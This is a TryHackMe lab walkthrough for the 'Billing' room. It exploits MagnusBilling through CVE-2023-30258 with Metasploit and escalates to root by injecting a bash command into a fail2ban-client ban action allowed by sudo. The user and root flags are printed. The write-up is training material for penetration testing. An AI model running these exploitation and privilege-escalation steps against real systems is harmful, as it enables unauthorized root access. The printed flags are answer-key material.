🧠 TryHackMe Room Walkthrough: Billing

Room Link: https://tryhackme.com/room/billing
Written by: Aditya Bhatt | THM Addict

---

📦 Overview

In this walkthrough, we go full force into TryHackMe's Billing Room, showcasing a vulnerable MagnusBilling instance, a juicy unauth RCE (CVE-2023-30258), and a fail2ban sudo misconfig that screams “root me.”

This room beautifully blends automated exploitation with creative privilege escalation, giving us a hands-on taste of real-world flaws hiding in VoIP billing software. We’ll go from Initial Recon to Root Shell with full PoC, commentary, and 🗿 vibes.

---

🌐 Step 1: Enumeration Phase

🏁 Initial Landing

After deploying the machine, the first thing that hits you like a misconfigured firewall:

http://<machine_IP>/mbilling/

This is the MagnusBilling login page. That alone triggers bells — you know you’re in for some juicy CVE play.

---

🔍 Nmap Deep Recon + Gobuster

We begin with the ultimate recon combo:

nmap -A -sV -p- 10.10.115.173

🧠 Findings:

• Port 5038 – Asterisk Call Manager/2.10.6
• Other HTTP services are available under /mbilling/

Next, we go full brute with Gobuster:

gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt

🧠 Findings:

• robots.txt

🏗️ robots.txt

Then we check the site's robots.txt for anything spicy:

User-agent: *
Disallow: /mbilling/

Hmm… trying to hide it just makes us want it more 😈

---

🔌 Step 2: Exploitation

🔥 Port 5038 – Asterisk Manager

A quick netcat test confirms it responds with:

Response: Error
Message: Missing action in request

Which further confirms: the backend is MagnusBilling, and the port is linked with Asterisk Call Manager. Time to summon our dark arts 🧙

---

⚔️ Weapon of Choice: CVE-2023-30258

Exploit: Unauthenticated Remote Code Execution in MagnusBilling Module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

Fire up Metasploit:

msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

Then check the requirements:

show options

Then set the following:

set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run

A few seconds later… Boom. We got a Meterpreter session!

shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64

Tried spawning a TTY shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

---

🧭 Step 3: User Enumeration

We start traversing upward with:

cd ..
cd ..

Until we find:

cd /home/magnus
cat user.txt

🏁 User Flag: THM{4a6831d5f124b25eefb1e92e0f0da4ca}

Nice! But we’re not done. We need root, and Magnus is whispering secrets to us.

---

🧨 Step 4: Privilege Escalation

Let’s check what we can run with sudo:

sudo -l

Result:

(ALL) NOPASSWD: /usr/bin/fail2ban-client

Now this is 🔥. We can abuse fail2ban-client to execute commands as root using ban actions.

---

🎯 Fail2Ban Abuse → Root Shell

Let’s restart fail2ban:

sudo /usr/bin/fail2ban-client restart

Then inject the command to steal the root flag:

sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"

Trigger the ban (and thus the command):

sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1

Then:

cat /tmp/root.txt

🏁 Root Flag: THM{33ad5b530e71a172648f424ec23fae60}

Rooted. Like. A. Boss. 🗿🔥

---

✅ Final Recap Table

🔎 Stage	💥 Action/Tool Used
Initial Access	Discovered /mbilling portal and port 5038 using Nmap + Gobuster
Recon Discovery	MagnusBilling CMS + Asterisk Call Manager
Exploitation	CVE-2023-30258 via Metasploit → Meterpreter shell
Enumeration	Located /home/magnus/user.txt
Privilege Escalation	Abused fail2ban-client sudo NOPASSWD → RCE as root
Root Flag	Retrieved /root/root.txt via fail2ban payload injection

---

🧠 What You Learned (a.k.a. Semi-Pro Wisdom)

1. 🔍 Recon isn’t just scanning – Look for hidden pages, check robots.txt, and dig into weird ports.
2. 💣 Exploit known CVEs – MagnusBilling was vulnerable to a public exploit (CVE-2023-30258).
3. 🔓 Privilege escalation doesn't always mean kernel exploits – Misconfigured sudo rights (like on fail2ban-client) are just as dangerous.
4. ⚙️ Creativity matters – Bypassing user restrictions with ban actions shows real-world lateral thinking.

---

🗿 Final Words

This box was a beautiful balance of automated exploitation and manual post-exploitation creativity. From MagnusBilling RCE to fail2ban-rooting, it hits all the right notes for a pentester’s playlist 🎧🎯

Whether you're a beginner looking to level up or a seasoned warrior collecting flags — this one’s a must-pwn.

Until next time, Stay Dangerous. Stay Curious. Stay Majestic. 🗿

---